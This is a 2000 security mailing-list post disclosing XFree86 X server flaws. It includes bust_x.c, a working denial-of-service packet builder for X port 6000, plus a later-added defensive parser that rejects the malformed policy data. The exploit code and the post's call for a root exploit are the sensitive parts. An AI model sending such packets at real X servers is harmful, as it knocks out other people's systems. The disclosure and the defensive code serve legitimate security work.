Subject: Re: another Xlib buffer overflow
From: Chris Evans (chris SCARY.BEASTS.ORG)
Date: Tue Oct 24 2000 - 14:44:34 CDT
- Next message: Roelof Temmingh: "IIS Unicode"
- Previous message: Forrest J. Cavalier III: "Re: Price modification in Element InstantShop"
- In reply to: Kris Kennaway: "Re: another Xlib buffer overflow"
- Next in thread: Robert van der Meulen: "Re: another Xlib buffer overflow"
- Reply: Chris Evans: "Re: another Xlib buffer overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On Sun, 15 Oct 2000, Kris Kennaway wrote:
> On Fri, Oct 13, 2000 at 11:37:01PM +0200, Matthieu Herrb wrote:
>
> > It was fixed in XFree86 4.0. From the CHANGELOG:
> >
> > XFree86 3.9Nu (13 January 1999)
> > [...]
> > 2141. Fix some sun_path overflows in xtrans.
>
> Wow, there's nothing like supporting the product release which
> everyone actually uses.
>
> XFree86 did the same thing with the other security problems a few
> months ago (fixed it silently in 4.0.1 and forced vendors who care to
> manually hunt down and extract the patches from their CVS repo and
> apply them by hand to their 3.3.6 package). Mail to their security
> contact address also went unanswered on this issue..
Hi Kris,
Well, I'm sufficiently underwhelmed by the response to recent XFree security
issues that I'm going to throw some fuel on the fire.
Below is a little packet builder which builds the DoS packet which you can
send to X port 6000. I didn't include it in my original advisory, which
may be located at:
http://www.securityfocus.com/archive/1/60869
However, this advisory contained ample information for a malicious party
to derive an exploit packet. This is why I have no problem sending my DoS
packet builder. Hopefully this post might prompt action from slower
vendors (even if it is inspired by irate users).
As well as the DoS issue, a lot of vendors still have the following X
related issues outstanding (I posted these about the same time as the
original DoS post):
A nasty hole which will almost certainly give localhost root in the
presence of suid-root X clients: [EXPLOIT PLEASE ANYONE?]
http://www.securityfocus.com/archive/1/65699
An irritating libICE DoS, affects GNOME-1.0 desktops:
http://www.securityfocus.com/archive/1/65692 [INCLUDED EXPLOIT]
And, of course, Michal's sun_path overflow which started this thread..
Cheers
Chris
/* bust_x.c
 * Demonstration purposes only!
 * Chris Evans <chris scary.beasts.org>
 *
 * Writes an X11 connection setup request to stdout, one field at a time.
 */
#include <string.h>   /* memset */
#include <unistd.h>   /* write */

int
main(int argc, const char* argv[])
{
    char bigbuf[201];
    short s;
    char c;

    (void)argc;
    (void)argv;

    /* Fill the auth data payload with 0x88 (-120 as a signed char) */
    c = -120;
    memset(bigbuf, c, sizeof(bigbuf));

    /* Little endian */
    c = 'l';
    write(1, &c, 1);
    /* PAD */
    c = 0;
    write(1, &c, 1);
    /* Major */
    s = 11;
    write(1, &s, 2);
    /* Minor */
    s = 0;
    write(1, &s, 2);
    /* Auth proto len */
    s = 19;
    write(1, &s, 2);
    /* Auth string len */
    s = 200;
    write(1, &s, 2);
    /* PAD */
    s = 0;
    write(1, &s, 2);
    /* Auth name */
    write(1, "XC-QUERY-SECURITY-1", 19);
    /* byte to round to multiple of 4 */
    c = 0;
    write(1, &c, 1);
    /* Auth data */
    /* Site policy please */
    c = 2;
    write(1, &c, 1);
    /* "permit" - doesn't really matter */
    c = 0;
    write(1, &c, 1);
    /* number of policies: -1, loop you sucker:) */
    c = -1;
    write(1, &c, 1);
    /* Negative stringlen.. 201 of them just in case, chortle... */
    write(1, bigbuf, sizeof(bigbuf));

    return 0;
}
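The packet above works because the server-side walk over the XC-QUERY-SECURITY-1 site-policy list trusts a one-byte policy count and one-byte string lengths read as signed values (the post's -1 and -120). What follows is an added example of my own, not code from the post or from XFree86, showing the defensive side: a parser for the connection setup request that reads every count and length as an unsigned byte and checks it against the bytes actually received. It assumes the 12-byte setup prefix of the core X protocol (byte-order byte, pad, major, minor, auth name length, auth data length, pad, then name and data each padded to a multiple of 4) and takes the site-policy data layout from the comments in bust_x.c (type 2, permit flag, policy count, length-prefixed strings). The status codes, function names and sample packets are constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Status codes for this example (my own names, not XFree86's). */
enum setup_status {
    SETUP_OK = 0,
    SETUP_TRUNCATED,        /* a length field points past the bytes received */
    SETUP_BAD_BYTE_ORDER,   /* first byte is neither 'l' nor 'B' */
    SETUP_BAD_POLICY_DATA   /* policy count or string length inconsistent with data */
};

/* Read a CARD16 in the byte order the client announced in byte 0. */
static uint16_t rd16(const unsigned char *p, int little_endian)
{
    return little_endian ? (uint16_t)(p[0] | (p[1] << 8))
                         : (uint16_t)((p[0] << 8) | p[1]);
}

static size_t pad4(size_t n) { return (n + 3) & ~(size_t)3; }

/* Walk the site-policy list carried as XC-QUERY-SECURITY-1 auth data.
 * Layout assumed from the comments in bust_x.c: type (2 = site policy),
 * permit flag, policy count, then that many length-prefixed strings.
 * Every count and length is an unsigned byte checked against the bytes
 * actually present, so 0xFF cannot act as -1 and 0x88 cannot act as -120. */
static enum setup_status
check_site_policy(const unsigned char *d, size_t len, unsigned *npolicies)
{
    if (len < 1) return SETUP_BAD_POLICY_DATA;
    if (d[0] != 2) return SETUP_OK;     /* not a site-policy query; nothing to walk */
    if (len < 3) return SETUP_BAD_POLICY_DATA;
    unsigned n = d[2];
    size_t off = 3;
    for (unsigned i = 0; i < n; i++) {
        if (off >= len) return SETUP_BAD_POLICY_DATA;        /* count exceeds entries present */
        size_t slen = d[off++];
        if (slen > len - off) return SETUP_BAD_POLICY_DATA;  /* string runs past the data */
        off += slen;
    }
    if (npolicies) *npolicies = n;
    return SETUP_OK;
}

/* Validate one connection setup request exactly as received from the socket. */
enum setup_status
parse_setup_request(const unsigned char *buf, size_t len, unsigned *npolicies)
{
    if (len < 12) return SETUP_TRUNCATED;            /* fixed 12-byte prefix */
    int le;
    if (buf[0] == 'l') le = 1;
    else if (buf[0] == 'B') le = 0;
    else return SETUP_BAD_BYTE_ORDER;
    uint16_t name_len = rd16(buf + 6, le);
    uint16_t data_len = rd16(buf + 8, le);
    size_t name_off = 12;
    if (pad4(name_len) > len - name_off) return SETUP_TRUNCATED;
    size_t data_off = name_off + pad4(name_len);
    if (pad4(data_len) > len - data_off) return SETUP_TRUNCATED;
    if (name_len == 19 && memcmp(buf + name_off, "XC-QUERY-SECURITY-1", 19) == 0)
        return check_site_policy(buf + data_off, data_len, npolicies);
    return SETUP_OK;   /* other auth protocols are outside this example */
}

/* Constructed sample: well-formed little-endian request, one policy "default". */
static const unsigned char good_req[] = {
    'l', 0, 11, 0, 0, 0, 19, 0, 11, 0, 0, 0,
    'X','C','-','Q','U','E','R','Y','-','S','E','C','U','R','I','T','Y','-','1', 0,
    2, 0, 1, 7, 'd','e','f','a','u','l','t', 0
};

/* Constructed sample with the shape of the packet bust_x.c emits:
 * policy count 0xFF and string lengths 0x88 (out must hold 232 bytes). */
size_t build_malformed_req(unsigned char *out)
{
    static const unsigned char hdr[] = { 'l', 0, 11, 0, 0, 0, 19, 0, 200, 0, 0, 0 };
    size_t n = 0;
    memcpy(out + n, hdr, sizeof hdr);               n += sizeof hdr;
    memcpy(out + n, "XC-QUERY-SECURITY-1", 19);     n += 19;
    out[n++] = 0;                                   /* pad name to 20 bytes */
    out[n++] = 2; out[n++] = 0; out[n++] = 0xFF;    /* site policy, permit, 255 policies */
    memset(out + n, 0x88, 197);                     n += 197;
    return n;                                       /* 232 bytes: 12 + 20 + 200 */
}

enum setup_status check_good_sample(unsigned *npolicies)
{
    return parse_setup_request(good_req, sizeof good_req, npolicies);
}

enum setup_status check_malformed_sample(void)
{
    unsigned char buf[256];
    size_t n = build_malformed_req(buf);
    return parse_setup_request(buf, n, NULL);
}

/* Same packet cut short after 40 bytes, as a slow or aborted client would leave it. */
enum setup_status check_truncated_sample(void)
{
    unsigned char buf[256];
    build_malformed_req(buf);
    return parse_setup_request(buf, 40, NULL);
}

int main(void)
{
    unsigned n = 0;
    printf("good: %d (policies=%u)\n", check_good_sample(&n), n);
    printf("malformed: %d\n", check_malformed_sample());
    printf("truncated: %d\n", check_truncated_sample());
    return 0;
}
```

The two checks that matter are the ones in check_site_policy: the count loop stops as soon as the data runs out, and each string length is compared against the remaining bytes before the offset advances. With those in place the 0xFF/0x88 packet is rejected on its second policy entry instead of walking off the end of the buffer, and a request whose length fields promise more than arrived is rejected before any auth data is touched.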